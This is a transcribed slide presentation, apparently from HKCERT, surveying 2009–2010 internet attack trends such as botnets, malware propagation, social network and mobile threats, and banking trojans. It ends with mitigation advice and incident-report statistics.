The document summarizes trends in internet attacks and security threats. It discusses how vulnerabilities are exploited through techniques like social engineering, insecure configurations, and software vulnerabilities. It also describes common malware propagation methods, targeted attacks on individuals and organizations, and recommendations for mitigation strategies including education, awareness, and proactive incident handling.

1. Internet Attack Trend and Defense SC Leung Senior Consultant

2. Agenda Trend of the information security threat How we become victims … Most economical way to mitigate risks

3. Security Threat Landscape

4. Attacks targeting at Our Vulnerabilities Insecure Configuration defaults: AutoRuns in USB, CDROM … All software have security holes Opportunity Window between discovery of security hole and availability of Patch People can be cheated “ Social Engineering” techniques How can you gain trust from others == How can hacker gain trust from you System and Applications Human

5. New Phishing Tactic Targets Tabs http:// www.azarask.in /blog/post/a-new-type-of-phishing-attack/ (Proof of concept included) http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/

6. Botnet ( ro Bot Net work ) ‏ is the major threat Bot Herder C&C Command & Control Centre Bots attacks Your computers! victim victim bot bot bot

7. Maturity of the Underground Economy Sell products (credentials malware and tools) Hosting - spam or phishing hosting CaaS (cybercrime as a service) - hired gun Commercialization Professionalization Manageability of Infrastructure  Botnets Specialization, Outsourcing, and Globalization of HR Chained exploits Risk Management Invisibility Security authentication, encryption Survivability e.g. Conficker sophistication

8. Malware 2.0 Evade Detection Command & Control Propagation Forming a Botnet Manage Update Survive the adverse Malware today causes victim PC becoming part of botnet

9. Malware 2.0 Encryption or obfuscation Morphing Uses Search Engine to evade detection Malware URL visible only when referred by search engine Done by configuring “.htaccess” file of web server Sample content of “.htaccess” file under hacker’s control

10. Malware Propagation channels Executables Document Malware Website

11. Malware Propagation channels Fake security software Fake video player codec Executables Document Malware Website

12. Malware Propagation channels Executables Document Malware Embedded malware in PDF or Office files Zeus botnet served PDF malware (Apr-2010) Website Image by Websense

13. Malware Propagation channels Executables Document Malware Website Legitimate and trusted websites compromised Used to redirect user to malicious websites (via injected invisible iframes) Most significant Web admin incapable to detect and mitigate the risks

14. Malware Propagation via websites Mass infection of Wordpress blogs hosted by Network Solutions (Apr 2010) Use insecure web application configuration

15. PHPNuke.org web site hacked in May 2010 PHPNuke.org web site hacked (7 May 2010) Serving several exploits

16. Malware Propagation Channels Hackers exploit Social Network Services to convince victims Hacker uses Search Engine Optimization techniques to escalate malicious website ranking in search results Executables Document Malware Website Social Engineering & Black Hat SEO

17. Targeted Attacks Targeted, crafted email to corporations and government Executables Document Malware Website Social Engineering & Black Hat SEO Targeted Attacks

18. Attacks Following Money Targeting traditional online banking, online game Obtaining credential for later use or for sale via keyloggers Phishing Banking Trojans Targeting new online banking services, esp. two factor authentication Performing transaction on the spot via advanced banking trojans, using involved man-in-the browser techniques

19. Data Leakage Insecure default settings Malware embedded in P2P software e.g. Foxy software P2P File Sharing Social Networking Services Insecure default privacy settings Leak out of personal information by friends Lack of control 3 rd party apps on SNS Malware on SNS

20. Social network Id Theft Data Leakage Social Engineering

21. Client Side attacks via Social Network Sites Surge in Facebook Malware TRUST: Use social engineering trick, spoofing user’s friend and sending a message with an URL pertaining to be a movie URL brings user to a fake YouTube site

22. Client Side attacks via Social Network Sites Suggesting to install a codec in order to view the movie Install the codec to view the movie

23. Submitting the malware to VirusTotal.com Only small portion of scanners can identify the malware

24. Malicious servers redirect victims to the Exploit Server which serves as a central delivery Redirection of attacks to central exploit server Source: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm

25. Mobile Computing Attacks exist for different mobile platforms 2009-11 Attack jailbreak iPhones’s SSH backdoor MobileSpy logs GPS location, call logs, sms log. Versions available for Android, Blackberry, iPhone, Windows Mobile, Symbian Store personal & sensitive data Some banks (UK Lloyd TSB) start to use as the client tool NextGen data/voice integration Insecure habits Short URLs is common Click links in email is common Saved passwords is common Security protection less mature than in PC

26. Targeted Attack continues Chained exploit Advanced Persist Threats Governments, critical infrastructure, private companies

27. Consequence of Attack

28. Consequences of Security Exposure Machines fall into control by Hackers Theft of Credentials  financial loss Hacker launch local attacks to the whole network Bandwidth and Performance downgrade Legal liability  liable for hacking activities within your premise

29. Mitigation Strategies Revisited

30. What do we do? Good example of Conficker Working Group collecting information of hacker behaviour International Collaboration Cyber Drill Exercise Proactive Discovery of Incidents Intelligence and Research finding compromised web site and malware hosting

31. Awareness Education and Training Awareness Social Engineering Emerging attacks like SNS, mobile Social Engineering Drill Exercise Publish Guidelines Training of staff Local cyber response drills Cyber Response Drill – some teams do hold it annually Form ISAC (Information Sharing and Advisory Centre) Public ISPs

32. Proactivity in Incident Handling in HKCERT Incident Reports Statistics (Apr-3 to Sep-30 2009) Traditional report vs Proactive Discovery (search incidents that are not reported) Traditional report: 493 (60%); Proactive Discovery: 330 (40%) Among Traditional reports (493 cases) Direct Phone in: 244 (49.5%), Referral: 170 (34.5%), Direct Email: 79 (16%), Report by Local parties: 329 (67%), Report by Overseas parties: 164 (33%) Conclusion: Proactive Discovery is becoming a key source of incident reports Overseas and referral reports has a significant portion. We are aware more resources are required for handling external communication, development of automated searching capability

33. What can you do – infrastructure? Install Antivirus Install Personal Firewall Close all security holes Patch systems Set Strong Password Close Insecure default settings: Autorun, … Install Antivirus Install Firewall. Block all incoming traffic except known services Separate SAMS, ITED and public servers in zones Set up Security Policy Ban unauthorized servers in your network Personal Company

34. HKCERT Guidelines "Autorun virus" Removal Procedure SQL Injection Defense Guideline Data Protection Guideline Guideline for Safety Using Wireless LA SME Information Security Guideline Guideline for Prevention of Spyware and other Potentially Unwanted Software http:// www.hkcert.org/english/sguide_faq/home.html

35. Point of Contact Phone : +852 8105 6060 Fax : +852 8105 9760 Email : hkcert @ hkcert.org URL : http://www.hkcert.org/